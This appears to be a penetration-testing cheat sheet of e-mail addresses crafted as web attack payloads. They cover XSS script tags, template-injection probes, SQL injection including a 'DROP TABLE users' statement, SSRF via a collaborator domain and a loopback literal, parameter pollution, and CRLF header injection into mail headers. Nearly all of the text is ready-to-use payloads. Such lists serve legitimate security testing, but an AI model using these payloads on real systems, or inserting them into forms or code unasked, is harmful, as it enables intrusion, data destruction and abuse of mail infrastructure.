These are all valid e-mail addresses

XSS
test+(<script>alert(0)</script>)@example.com 
test@example(<script>alert(0)</script>).com 
"<script>alert(0)</script>"@example.com

Template Injection
"<%= 7*7%>"@example.com
test+(${{7*7}}) @example.com

SQLi
"OR 1=1 -- ""@example.com
"mail'); DROP TABLE users;--"@example.com

SSRF
john.doe@abc123.burpcollaborator.net
john.doe@[127.0.0.1]

Parameter pollution 
victim&email=attacker@example.com

Header injection (Email)
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"recipient@test.com>\r\nRCPT TO:<victim+"@test.com

